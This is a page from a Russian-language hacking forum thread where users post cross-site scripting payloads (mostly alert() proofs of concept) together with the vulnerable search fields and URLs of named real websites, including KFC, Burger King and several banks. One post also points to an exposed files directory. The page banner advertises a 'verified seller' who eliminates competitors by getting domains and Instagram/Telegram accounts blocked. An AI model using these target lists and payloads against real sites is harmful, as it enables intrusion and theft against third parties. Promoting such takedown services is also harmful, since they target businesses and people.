УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Уязвимости SQLi, XSS и другие.

Страница 18 из 35

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#171

30.08.2015, 21:21

DDShadoww

Guest

Сообщений: n/a

Провел на форуме:
2236

Репутация: 2

XSS на мобильной версии сайта KFC

target:m.kfc.ru/career-vacancies/member

type: XSS-Reflected

В поля Фамилия, имя вводим

Код:

Code:
">alert("XSS")

и так же в поле Мобильный телефон

#172

30.08.2015, 22:12

DDShadoww

Guest

Сообщений: n/a

Провел на форуме:
2236

Репутация: 2

BurgerKing

target: burgerking.ru

type: XSS-Reflected

В поля поиска

Код:

Code: ">alert(1)

#173

02.09.2015, 14:19

SaNDER

Guest

Сообщений: n/a

Провел на форуме:
51198

Репутация: 3

Target: _ttp://www.edelws.ru

Type : XSS-Reflected(вбивается под поисковик .)

Код:

Code: ">alert("WH")

#174

02.09.2015, 14:38

psihoz26

Guest

Сообщений: n/a

Провел на форуме:
182660

Репутация: 324

Цитата:

Сообщение от DDShadoww

DDShadoww said:
↑
target:3dnews.ru

type: XSS-Reflected
В поля поиска

Код:

Code: alert(1)

это DOM based XSS

работает даже в хроме

Код:

Code:
http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0

#175

02.09.2015, 14:44

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от psihoz26

psihoz26 said:
↑
это DOM based XSS
работает даже в хроме

Код:

Code:
http://www.3dnews.ru/search/#query=alert(1)&sdate=&edate=&intitle=0

страннло что у меня не работает, может хром старый?

#176

02.09.2015, 15:10

ocheretko

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
29

Репутация: 0

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
страннло что у меня не работает, может хром старый?

Введи в поиск и нажми значок поиска alert(1)

#177

07.09.2015, 22:31

Muracha

Guest

Сообщений: n/a

Провел на форуме:
54593

Репутация: 0

Код:

Code:
http://www.militarynews.ru/default.asp?SStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

пассивно-активная XSS.

Интересно то, что если после перехода по ссылке попробовать авторизоваться, то окошко авторизации выскакивает во второй раз.

#178

08.09.2015, 10:02

DDShadoww

Guest

Сообщений: n/a

Провел на форуме:
2236

Репутация: 2

Target: allbanks.ru

Type: Reflected

В поля поиска -

Код:

Code:
">alert(1)

Target: capitalbank.kz/oldsite/

Type: Reflected

В поля поиска -

Код:

Code:
">alert(1)

Target: asbank.ru/

Type: Reflected

В поля поиска -

Код:

Code:
">alert(1)

#179

09.09.2015, 18:30

d3q

Guest

Сообщений: n/a

Провел на форуме:
1698

Репутация: 0

Цитата:

Сообщение от SaNDER

SaNDER said:
↑
Target: _ttp://www.edelws.ru
Type : XSS-Reflected(вбивается под поисковик .)

Код:

Code: "<>script>alert("WH")

Видимо опечатка - второй и третий символ надо поменять местами
Код:

Code: ">alert("WH")

#180

12.09.2015, 20:53

DDShadoww

Guest

Сообщений: n/a

Провел на форуме:
2236

Репутация: 2

Target: foto7an.se

Type:Reflected and Stored

Весь в XSS. И еше бонус - foto7an.se/files/

Страница 18 из 35

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход